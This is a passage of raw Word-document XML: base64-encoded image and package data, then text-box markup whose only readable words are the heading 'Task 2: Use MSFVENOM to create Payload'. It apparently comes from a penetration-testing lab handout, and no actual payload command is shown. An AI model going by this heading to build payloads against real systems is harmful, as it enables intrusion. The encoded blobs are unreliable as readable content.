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&#10;">
                <v:rect id="Rectangle 9463" o:spid="_x0000_s1193" style="position:absolute;width:5204;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X0iMYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJ3upGW8TErCK1RY9WhejtkX1N&#10;QrNvQ3Y10V/fLQg9DjPzDZMue1OLK7WusqxgPIpAEOdWV1woOB4+X2YgnEfWWFsmBTdysFw8P6WY&#10;aNvxF133vhABwi5BBaX3TSKly0sy6Ea2IQ7et20N+iDbQuoWuwA3tZxE0VQarDgslNjQe0n5z/5i&#10;FGxmzeq0tfeuqD/Om2yXxetD7JUaDvrVHISn3v+HH+2tVhC/TV/h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OX0iMYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Task </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 9462" o:spid="_x0000_s1194" style="position:absolute;left:3901;width:1127;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lRE8UA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE7wv7HcJb8LamKyK2GkVWFz36D9Tbo3m2&#10;xealNFlb/fRGEDwOM/MbZjxtTSmuVLvCsoKfbgSCOLW64EzBfvf3PQThPLLG0jIpuJGD6eTzY4yJ&#10;tg1v6Lr1mQgQdgkqyL2vEildmpNB17UVcfDOtjbog6wzqWtsAtyUshdFA2mw4LCQY0W/OaWX7b9R&#10;sBxWs+PK3pusXJyWh/Uhnu9ir1Tnq52NQHhq/Tv8aq+0grg/6MH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qVETxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t>2</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 9466" o:spid="_x0000_s1195" style="position:absolute;left:4754;width:675;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JXEMYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74LfYXlCb7pRSjCpq4h/0KNVwfb2yL4m&#10;wezbkF1N2k/vFgSPw8z8hpktOlOJOzWutKxgPIpAEGdWl5wrOJ+2wykI55E1VpZJwS85WMz7vRmm&#10;2rb8Sfejz0WAsEtRQeF9nUrpsoIMupGtiYP3YxuDPsgml7rBNsBNJSdRFEuDJYeFAmtaFZRdjzej&#10;YDetl197+9fm1eZ7dzlckvUp8Uq9DbrlBwhPnX+Fn+29VpC8xzH8vwlP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JJXEMYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t>:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 9467" o:spid="_x0000_s1196" style="position:absolute;left:5257;width:4861;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7yi8cA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNpcQkuorUih6tFlJvj+xr&#10;Epp9G7Krif31XUHocZiZb5j5cjCNuFDnassKXsYRCOLC6ppLBZ/HzXMCwnlkjY1lUnAlB8vF48Mc&#10;M217/qDLwZciQNhlqKDyvs2kdEVFBt3YtsTB+7adQR9kV0rdYR/gppGTKIqlwZrDQoUtvVVU/BzO&#10;RsE2aVdfO/vbl837aZvv83R9TL1So6dhNQPhafD/4Xt7pxWkr/EUbm/C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fe8ovHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> Use </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 9464" o:spid="_x0000_s1197" style="position:absolute;left:8915;top:57;width:29048;height:28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xs/McA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmCN91YJJjoGoKtmGOrBevtkX1N&#10;QrNvQ3Zr0v76bqHQ4zAz3zC7bDStuFPvGssKVssIBHFpdcOVgtfLcbEB4TyyxtYyKfgiB9l+Otlh&#10;qu3AL3Q/+0oECLsUFdTed6mUrqzJoFvajjh477Y36IPsK6l7HALctPIhimJpsOGwUGNHh5rKj/On&#10;UXDadPlbYb+Hqn26na7P1+Txknil5rMx34LwNPr/8F+70AqSdbyG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cMbPzHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t>MSFVENOM to create Payload</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 9465" o:spid="_x0000_s1198" style="position:absolute;left:30739;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JZ8YA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJ3upGacXErCK1RY9WhejtkX1N&#10;QrNvQ3Y10V/fLQg9DjPzDZMue1OLK7WusqxgPIpAEOdWV1woOB4+X2YgnEfWWFsmBTdysFw8P6WY&#10;aNvxF133vhABwi5BBaX3TSKly0sy6Ea2IQ7et20N+iDbQuoWuwA3tZxE0VQarDgslNjQe0n5z/5i&#10;FGxmzeq0tfeuqD/Om2yXxetD7JUaDvrVHISn3v+HH+2tVhC/Tt/g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DJZ8YAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 833" o:spid="_x0000_s1199" style="position:absolute;top:2514;width:563;height:2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ruLsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3ppNK0iM2QTRFj22KtjeHtln&#10;Epp9G7Jbk/rruwXB4zAz3zBZMZpWXKh3jWUFz1EMgri0uuFKwfHw9pSAcB5ZY2uZFPySgyKfPGSY&#10;ajvwB132vhIBwi5FBbX3XSqlK2sy6CLbEQfvbHuDPsi+krrHIcBNK1/ieC4NNhwWauxoXVP5vf8x&#10;CrZJt/rc2etQta9f29P7abE5LLxSj9NxtQThafT38K290wqS2Qz+z4QjI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ruLsYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 11588" o:spid="_x0000_s1200" style="position:absolute;top:4459;width:50825;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="50825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I3HsUA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF7wX/wzJCb3Wj0CLRVUKk1UvRWn/AkB2T&#10;aHY2ZFeT/vvOQfA2w3vz3jfL9eAadacu1J4NTCcJKOLC25pLA6ffz7c5qBCRLTaeycAfBVivRi9L&#10;TK3v+Yfux1gqCeGQooEqxjbVOhQVOQwT3xKLdvadwyhrV2rbYS/hrtGzJPnQDmuWhgpbyisqrseb&#10;MzD7RrfPOMu3X7siObh80+v2YszreMgWoCIN8Wl+XO+s4E/f58Ir78gMevU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EjcexQAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m,l5082540,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5082540,175260"/>
                </v:shape>
                <v:rect id="Rectangle 835" o:spid="_x0000_s1201" style="position:absolute;top:4267;width:23001;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TwcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNWNFUuM2Yj0D3qsUVBvj+wz&#10;CWbfhuzWxH76bqHgcZiZ3zDpcjCNuFLnassKJuMIBHFhdc2lgv3u8zkG4TyyxsYyKbiRg2X2+JBi&#10;om3PW7rmvhQBwi5BBZX3bSKlKyoy6Ma2JQ7e2XYGfZBdKXWHfYCbRr5E0as0WHNYqLClt4qKS/5t&#10;FKzjdnXc2J++bD5O68PXYf6+m3ulRk/DagHC0+Dv4f/2RiuIpzP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d/TwcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
